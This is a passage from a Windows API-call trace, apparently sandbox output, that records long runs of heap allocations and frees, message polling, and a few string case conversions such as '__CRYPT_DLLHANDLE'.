hHeap=0x970000) returned 1 [0214.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0214.719] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0214.720] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0214.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0214.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0214.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0214.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0214.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0214.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0214.720] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0214.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0214.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0214.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0214.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0214.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0214.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0214.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0214.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0214.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0214.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0214.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0214.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0214.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0214.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0214.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0214.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0214.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0214.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0214.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0214.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699a8 [0214.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0214.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0214.721] CharLowerBuffW (in: lpsz="byte[46232]", cchLength=0xb | out: lpsz="byte[46232]") returned 0xb [0214.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977a28 [0214.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0214.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0214.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0214.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0214.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0214.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0214.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0214.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0214.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0214.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0214.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0214.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0214.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0214.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0214.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0214.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xb498) returned 0x2e80330 [0214.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0214.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0214.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0214.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0214.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0214.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0214.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0214.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0214.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0214.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0214.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0214.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ba8 [0214.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0214.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0214.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0214.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0214.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0214.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977a28 | out: hHeap=0x970000) returned 1 [0214.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0214.723] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0214.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0214.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0214.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69c08 [0214.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977908 [0214.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0214.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0214.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0214.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0214.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0214.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0214.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0214.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0214.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0214.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xb494) returned 0x2e8b7d0 [0214.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0214.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0214.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xb494) returned 0x2e96c70 [0214.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0214.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0214.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977908 | out: hHeap=0x970000) returned 1 [0214.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0214.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0214.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0214.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e8b7d0 | out: hHeap=0x970000) returned 1 [0214.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0214.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0214.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0214.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e96c70 | out: hHeap=0x970000) returned 1 [0214.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0214.821] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0214.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0214.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0214.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0214.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80220 [0214.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0214.821] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0214.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80220 | out: hHeap=0x970000) returned 1 [0214.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0214.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50848 [0214.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0214.822] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0214.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0214.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0214.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0214.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0214.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0214.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0214.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0214.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0214.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0214.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0214.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0214.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0214.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0214.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0214.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0214.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0214.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0214.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0214.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0214.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0214.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0214.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0214.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0214.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0214.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0214.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0214.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0214.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0214.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0214.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0214.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0214.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0214.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0214.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0214.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0214.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0214.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0214.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0214.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0214.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0214.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0214.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0214.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0214.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0214.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0214.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0214.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0214.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0214.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0214.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0214.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0214.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0214.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0214.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a88 [0214.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0214.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0214.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0214.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0214.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0214.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0214.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0214.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0214.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0214.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0214.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0214.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0214.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0214.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0214.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xb494) returned 0x2e8b7d0 [0214.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0214.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e8b7d0 | out: hHeap=0x970000) returned 1 [0214.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0214.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0214.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0214.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0214.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0214.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0214.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0214.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0214.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e56430 [0214.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0214.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0214.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0214.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0214.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0214.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0214.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a08 [0214.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9779f8 [0214.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0214.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0214.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0214.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0214.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0214.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9779f8 | out: hHeap=0x970000) returned 1 [0214.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0214.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0214.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0214.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0214.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0214.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0214.829] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0214.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0214.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0214.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0214.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0214.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0214.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0214.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0214.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0214.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0214.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0214.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0214.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0214.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0214.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0214.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0214.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0214.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0214.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0214.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0214.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0214.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0214.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0214.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0214.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0214.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0214.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0214.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0214.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0214.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0214.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0214.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0214.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, 